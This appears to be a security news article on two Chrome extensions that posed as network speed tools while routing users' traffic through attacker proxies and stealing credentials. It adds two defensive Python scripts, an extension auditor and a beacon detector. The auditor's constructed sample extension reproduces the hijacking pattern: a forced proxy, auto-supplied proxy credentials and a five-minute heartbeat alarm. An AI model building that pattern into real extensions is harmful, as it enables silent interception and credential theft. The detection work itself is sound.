Discovery of Malicious Chrome Extensions
Two Chrome extensions were recently found stealing user credentials. Cybersecurity researchers uncovered both add-ons during routine analysis, and the findings raise serious privacy concerns.
Both extensions share the same name and developer but carry different extension IDs, which made detection harder.
Disguised as a Legitimate Tool
The extensions claim to offer network speed testing services aimed at developers and international trade workers, but this description hides their true behavior.
Users believe they are buying a VPN-like service, so many willingly pay subscription fees.
Users pay monthly or yearly fees for premium access. Once payment completes, the extension grants VIP status, and that is what activates the malicious features: VIP mode automatically enables a proxy setting, so the user's traffic flows through attacker-controlled servers.
How Traffic Interception Works
The extensions route traffic from over 170 domains, including cloud platforms and developer tools, which exposes high-value credentials.
They also intercept social media and adult websites; researchers believe this enables blackmail attempts.
Malicious JavaScript Injection
The extensions modify bundled JavaScript files, specifically the common libraries that websites rely on, so the malicious code runs silently.
The script injects hard-coded proxy credentials, so users never see an authentication prompt.
The extensions operate as man-in-the-middle proxies while users see only normal browsing behavior, which keeps suspicion low. Attackers gain full visibility into web traffic, including login sessions and form submissions.
Every five minutes the extensions send data, such as email addresses and passwords, to an external server, so attackers receive constant updates.
A heartbeat signal also confirms that the extension remains active, so monitoring continues uninterrupted.
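The traits described in this section (proxy control, hard-coded proxy credentials injected into bundled scripts, and a fixed-interval alarm) are all visible statically in an unpacked extension. The following script is an added example written for this page, not code from the researchers or from the extensions themselves. It audits an extension's manifest and JavaScript for those traits. The sample extension, its hostname `proxy.example.invalid` and the password literal are constructed placeholders; the Chrome APIs it looks for (`chrome.proxy.settings.set`, `chrome.webRequest.onAuthRequired`, `chrome.alarms.create`) and the permission names are real.

```python
"""Static audit of an unpacked Chrome extension for proxy-hijacking traits:
proxy permission, forced proxy configuration, hard-coded proxy credentials,
and periodic alarms. Works on an in-memory {path: text} mapping so it can be
tested offline; load_unpacked() reads a real extension directory."""
import json
import os
import re
from typing import Dict, List

# Permissions that let an extension redirect or silently authenticate traffic.
RISKY_PERMISSIONS = {"proxy", "webRequest", "webRequestAuthProvider",
                     "webRequestBlocking", "declarativeNetRequest"}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Source patterns for the behaviours described in the article.
PATTERNS = {
    "forced_proxy_config": re.compile(r"chrome\.proxy\.settings\.set|fixed_servers|pac_script"),
    "hardcoded_proxy_auth": re.compile(
        r"onAuthRequired|authCredentials|Proxy-Authorization", re.I),
    "credential_literal": re.compile(r"""password\s*:\s*["'][^"']+["']"""),
    # chrome.alarms with a fixed period, or setInterval with a 6-digit ms period (>= 100 s)
    "periodic_beacon": re.compile(
        r"periodInMinutes\s*:\s*\d+|setInterval\([^)]*,\s*[1-9][0-9]{5}\s*\)"),
}


def load_unpacked(root: str) -> Dict[str, str]:
    """Read manifest.json and every .js file under an unpacked extension dir."""
    files: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n == "manifest.json" or n.endswith(".js"):
                p = os.path.join(dirpath, n)
                with open(p, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(p, root)] = fh.read()
    return files


def audit_extension(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Return {finding: [evidence, ...]} for the traits present in the extension."""
    findings: Dict[str, List[str]] = {}
    manifest = json.loads(files.get("manifest.json", "{}"))
    perms = set(manifest.get("permissions", []))
    # MV2 puts host patterns in "permissions", MV3 in "host_permissions"; check both.
    hosts = set(manifest.get("host_permissions", [])) | perms
    risky = sorted(perms & RISKY_PERMISSIONS)
    if risky:
        findings["risky_permissions"] = risky
    if hosts & BROAD_HOSTS:
        findings["broad_host_access"] = sorted(hosts & BROAD_HOSTS)
    for path, text in files.items():
        if not path.endswith(".js"):
            continue
        for name, rx in PATTERNS.items():
            for m in rx.finditer(text):
                findings.setdefault(name, []).append(f"{path}: {m.group(0)}")
    return findings


def risk_level(findings: Dict[str, List[str]]) -> str:
    """Collapse findings into a triage label. Proxy control combined with
    hard-coded credentials is the signature of the campaign described above."""
    if "forced_proxy_config" in findings and (
            "hardcoded_proxy_auth" in findings or "credential_literal" in findings):
        return "critical"
    if "risky_permissions" in findings and "broad_host_access" in findings:
        return "high"
    return "medium" if findings else "low"


# Constructed sample mimicking the described extension (hostname and secret are placeholders).
SAMPLE_FILES = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Speed Test Helper",
        "permissions": ["proxy", "webRequest", "webRequestAuthProvider", "alarms", "storage"],
        "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "background.js"},
    }),
    "background.js": (
        'chrome.proxy.settings.set({value: {mode: "fixed_servers", rules: {singleProxy: '
        '{scheme: "https", host: "proxy.example.invalid", port: 443}}}, scope: "regular"});\n'
        'chrome.webRequest.onAuthRequired.addListener(() => ({authCredentials: '
        '{username: "vip", password: "PLACEHOLDER_SECRET"}}), {urls: ["<all_urls>"]}, ["blocking"]);\n'
        'chrome.alarms.create("heartbeat", {periodInMinutes: 5});\n'
    ),
    "lib/vendor.min.js": "/* benign bundled library */ function f(){return 1}",
}

if __name__ == "__main__":
    result = audit_extension(SAMPLE_FILES)
    for finding, evidence in result.items():
        print(finding, evidence)
    print("risk:", risk_level(result))
```

Point `load_unpacked()` at a profile's extension directory (or at a CRX unzipped with any archive tool) to run the same checks on installed add-ons; a "critical" result means the extension can both redirect traffic and answer the proxy's authentication challenge without the user ever seeing a prompt, which is exactly the combination the researchers describe.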
High-Risk Data Exposure
Stolen data includes passwords and payment details, and attackers also collect API keys and access tokens, which puts developer accounts at severe risk.
Compromised credentials may enable supply chain attacks, creating broader organizational impact.
Signs of Organized Operations
The infrastructure shows long-term planning: researchers noted professional payment systems and cloud hosting, so the operation appears well-funded.
Language indicators and payment methods suggest an Asia-based origin, although attribution remains unconfirmed.
Browser extensions now pose an unmanaged risk. Employees often install tools without review, so sensitive data leaks silently. Security teams must reassess extension controls, and monitoring extension permissions is critical.
How to Prevent Credential Theft
Organizations should enforce browser extension allowlists. Continuous monitoring can detect suspicious proxy behavior early, and endpoint protection backed by threat intelligence helps block malicious add-ons before damage occurs.
Sleep well, we've got you covered.
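The "suspicious proxy behavior" that monitoring should catch has two network-level tells from the earlier sections: client traffic flowing to a proxy host nobody approved, and the fixed five-minute exfiltration and heartbeat cadence. The script below is an added example for this page, not the researchers' tooling; it parses constructed egress log lines, finds (client, destination) pairs whose inter-arrival times are nearly constant, and raises an alert only when the destination is not on an approved proxy list. The log format, the client addresses and the `.invalid` hostnames are all constructed assumptions.

```python
"""Detect beacon-like, fixed-interval traffic to unapproved hosts in egress logs.
Log format (constructed for this example): 'ISO-timestamp src=IP dst=host:port bytes=N'."""
import re
from collections import defaultdict
from datetime import datetime, timezone
from statistics import mean, pstdev

LINE_RE = re.compile(r"^(\S+) src=(\S+) dst=(\S+):(\d+) bytes=(\d+)$")


def parse_log(text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    records = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        records.append({"ts": ts, "src": m.group(2), "dst": m.group(3),
                        "port": int(m.group(4)), "bytes": int(m.group(5))})
    return records


def find_beacons(records, min_count=4, max_jitter=0.1):
    """Group flows by (src, dst) and flag pairs whose gaps between connections are
    nearly constant (relative std dev <= max_jitter). Returns
    {(src, dst): {"period_s": int, "count": n}}."""
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["src"], r["dst"])].append(r["ts"])
    beacons = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_count:
            continue  # too few samples to call a cadence
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        if period > 0 and pstdev(gaps) / period <= max_jitter:
            beacons[pair] = {"period_s": int(round(period)), "count": len(stamps)}
    return beacons


def triage(records, approved_hosts):
    """Alert on beacons whose destination is not an approved proxy/update host."""
    alerts = []
    for (src, dst), info in find_beacons(records).items():
        if dst not in approved_hosts:
            alerts.append({"src": src, "dst": dst, **info})
    return sorted(alerts, key=lambda a: (a["src"], a["dst"]))


# Constructed sample: one client beacons every ~5 minutes to an unapproved host,
# another beacons to the corporate proxy (approved), the rest is irregular or sparse.
SAMPLE_LOG = """
2024-01-01T10:00:00Z src=10.0.0.5 dst=proxy.example.invalid:443 bytes=812
2024-01-01T10:00:30Z src=10.0.0.5 dst=updates.example.invalid:443 bytes=4096
2024-01-01T10:01:10Z src=10.0.0.5 dst=updates.example.invalid:443 bytes=120
2024-01-01T10:05:02Z src=10.0.0.5 dst=proxy.example.invalid:443 bytes=790
2024-01-01T10:07:45Z src=10.0.0.5 dst=updates.example.invalid:443 bytes=2048
2024-01-01T10:09:59Z src=10.0.0.5 dst=proxy.example.invalid:443 bytes=805
2024-01-01T10:15:01Z src=10.0.0.5 dst=proxy.example.invalid:443 bytes=811
2024-01-01T10:20:00Z src=10.0.0.5 dst=proxy.example.invalid:443 bytes=799
2024-01-01T10:22:00Z src=10.0.0.5 dst=updates.example.invalid:443 bytes=300
2024-01-01T10:24:58Z src=10.0.0.5 dst=proxy.example.invalid:443 bytes=820
2024-01-01T10:00:00Z src=10.0.0.7 dst=approved-proxy.corp.invalid:3128 bytes=500
2024-01-01T10:05:00Z src=10.0.0.7 dst=approved-proxy.corp.invalid:3128 bytes=500
2024-01-01T10:10:00Z src=10.0.0.7 dst=approved-proxy.corp.invalid:3128 bytes=500
2024-01-01T10:15:00Z src=10.0.0.7 dst=approved-proxy.corp.invalid:3128 bytes=500
2024-01-01T10:00:00Z src=10.0.0.9 dst=proxy.example.invalid:443 bytes=700
2024-01-01T10:05:00Z src=10.0.0.9 dst=proxy.example.invalid:443 bytes=700
"""
APPROVED_HOSTS = {"approved-proxy.corp.invalid"}

if __name__ == "__main__":
    for alert in triage(parse_log(SAMPLE_LOG), APPROVED_HOSTS):
        print("ALERT", alert)
```

A real deployment would feed this from the web proxy or firewall export and pair it with the allowlist already enforced on the browser side: a client that beacons to a host absent from both the extension allowlist's expected endpoints and the approved proxy list is worth pulling the extension inventory for, and the period reported in the alert (300 s here) is what links the network signal back to the five-minute cadence the researchers observed.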